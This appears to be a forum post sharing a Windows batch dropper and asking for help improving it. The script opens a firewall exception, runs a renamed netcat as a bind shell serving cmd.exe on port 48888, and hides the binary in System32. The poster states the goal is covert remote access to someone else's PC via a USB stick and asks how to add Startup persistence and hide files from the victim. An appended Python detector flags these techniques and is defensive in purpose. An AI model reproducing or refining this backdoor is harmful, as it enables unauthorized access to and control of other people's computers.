Code:
echo off
cls
netsh firewall add allowedprogram winlog.exe winlog ENABLE
ipconfig /all > data.txt
start winlog.exe -d -l -p 48888 -e cmd.exe
copy winlog.exe C:\WINDOWS\System32
exit
Legal stuff: This is for education / curiosity reasons ONLY. If you use it for illegal activities you are on your own and no one else but you is responsible.
My mods are to actually get nc to run in the background, and even bypass the Windows firewall if run from an admin shell.
I also extract the PC data to connect to it at my leisure (the concept is simple: plug in the USB memory stick, execute the file, unplug, leave) and copy it to system32 because regular users rarely ever touch this thing, and the renamed file looks totally legitimate there, alongside winlogon.exe which, BTW, is a Windows essential procedure and can't be terminated. Also, system32 is by default in the PATH, along with the Windows directory, so I can execute it from everywhere on the PC. You get where I am going?
What this misses is the simple fact that I have to make it run every time the user starts the PC. I know that the obvious choice is the startup folder, but it is located in the user's personal folder, hence the problem: is there any scripting adept out there who can enlighten me with the proper %what-should-I-put-here% thing, so I can just do:
copy StartEveryTime.bat %whatever%\startup ?
Also, I need another command to change the folder settings to NOT show hidden files. That way he/she won't ever take notice.
For now I have to do both of the aforementioned actions manually. So today I ask the help from any mischievous script guru and enthusiast.
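From the defender's side, as an added example that is not part of the original post: a small Python triage script that flags the techniques this dropper relies on (a netsh firewall exception, a listener that hands out cmd.exe, a binary copied into System32, a file copied into a Startup folder) when run over a batch file. The sample input is the batch file quoted above; the rule patterns and the two-rule threshold are my own assumptions, not a vetted signature set.

```python
import re

# Constructed sample input: the dropper batch file quoted in the post above.
SAMPLE_BAT = r"""echo off
cls
netsh firewall add allowedprogram winlog.exe winlog ENABLE
ipconfig /all > data.txt
start winlog.exe -d -l -p 48888 -e cmd.exe
copy winlog.exe C:\WINDOWS\System32
exit
"""

# Triage rules (name, pattern). These are assumptions about how this kind of
# dropper tends to read, not a vetted signature set; expect false positives.
RULES = [
    # punching a hole in the host firewall for a named program
    ("firewall-exception",
     re.compile(r"\bnetsh\b.*\bfirewall\b.*\badd\b.*\ballowedprogram\b", re.I)),
    # a listener (-l) that hands the connecting party a shell (-e cmd.exe)
    ("bind-shell-listener",
     re.compile(r"\s-l\b.*\s-e\s+\S*cmd(\.exe)?\b", re.I)),
    # a binary being copied into the system directory to blend in
    ("drop-into-system32",
     re.compile(r"\b(copy|move|xcopy)\b.*\\system32\b", re.I)),
    # a file being copied into a Startup folder for persistence
    ("startup-folder-drop",
     re.compile(r"\b(copy|move|xcopy)\b.*\\startup\b", re.I)),
]


def scan_batch(text):
    """Map 1-based line numbers to the names of the rules they trigger."""
    hits = {}
    for no, line in enumerate(text.splitlines(), 1):
        names = [name for name, rx in RULES if rx.search(line)]
        if names:
            hits[no] = names
    return hits


def is_suspicious(text, threshold=2):
    """Flag a script when at least `threshold` distinct rules fire anywhere in it."""
    fired = {name for names in scan_batch(text).values() for name in names}
    return len(fired) >= threshold


if __name__ == "__main__":
    for no, names in sorted(scan_batch(SAMPLE_BAT).items()):
        print(f"line {no}: {', '.join(names)}")
    print("verdict:", "suspicious" if is_suspicious(SAMPLE_BAT) else "clean")
```

Each rule on its own is noisy (administrators copy files into System32 too); the threshold exists so that only scripts combining several of these steps get flagged for a closer look.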